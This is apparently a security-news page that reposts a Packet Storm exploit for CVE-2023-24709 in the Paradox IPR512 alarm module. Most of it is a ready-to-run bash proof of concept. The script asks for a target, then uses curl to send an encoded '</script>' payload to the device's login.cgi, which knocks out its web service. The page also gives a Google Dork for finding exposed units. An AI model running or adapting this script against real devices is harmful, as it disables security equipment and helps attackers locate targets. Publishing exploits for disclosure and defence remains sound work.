Security
Headlines
HeadlinesLatestCVEs

Headline

Paradox Security Systems IPR512 Denial Of Service

Paradox Security Systems version IPR512 suffers from a denial of service vulnerability.

Packet Storm
Open in Source
#vulnerability#web#windows#apple#google#dos#auth#chrome#webkit

#!/bin/bash

Exploit Title: Paradox Security Systems IPR512 - Denial Of Service

Google Dork: intitle:"ipr512 * - login screen"

Date: 09-APR-2023

Exploit Author: Giorgi Dograshvili

Vendor Homepage: Paradox - Headquarters https://www.paradox.com/Products/default.asp?PID=423 (https://www.paradox.com/Products/default.asp?PID=423)

Version: IPR512

CVE : CVE-2023-24709

Function to display banner message

display_banner() {
echo “******************************************************”
echo “* "
echo " PoC CVE-2023-24709 "
echo " BE AWARE!!! RUNNING THE SCRIPT WILL MAKE "
echo " A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! "
echo " by SlashXzerozero "
echo " *”
echo “******************************************************”
}

Call the function to display the banner

display_banner
echo “”
echo “”
echo “Please enter a domain name or IP address with or without port”
read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain

Step 2: Ask for user confirmation

read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm
if [[ $confirm == “Y” || $confirm == “y” ]]; then

Display loading animation

animation=(“|” “/” "-" “\”)
index=0
while [[ $index -lt 10 ]]; do
echo -ne “Loading ${animation[index]} \r”
sleep 1
index=$((index + 1))
done

Use curl to send HTTP GET request with custom headers and timeout

response=$(curl -i -s -k -X GET \
-H “Host: $domain” \
-H “User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36” \
-H “Accept: */” \
-H “Referer: http://$domain/login.html” \
-H “Accept-Encoding: gzip, deflate” \
-H “Accept-Language: en-US,en;q=0.9” \
-H “Connection: close” \
–max-time 10 \
“http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982”)

Check response for HTTP status code 200 and print result

if [[ $response == “HTTP/1.1 200 OK” ]]; then
echo -e “\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html”
else
echo -e “\nShouldn’t be vulnerable! Please check the webpanel: http://$domain/login.html”
fi
else
echo “The script is stopped!.”
fi

Related news

CVE-2023-24709: GitHub - SlashXzerozero/Injection-vulnerability-in-Paradox-Security-Systems-IPR512: In Paradox Security System IPR512 Web console login form page, attacker can input JavaScript string, e.g. "<script>a

An issue found in Paradox Security Systems IPR512 allows attackers to cause a denial of service via the login.html and login.xml parameters.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution
Packet Storm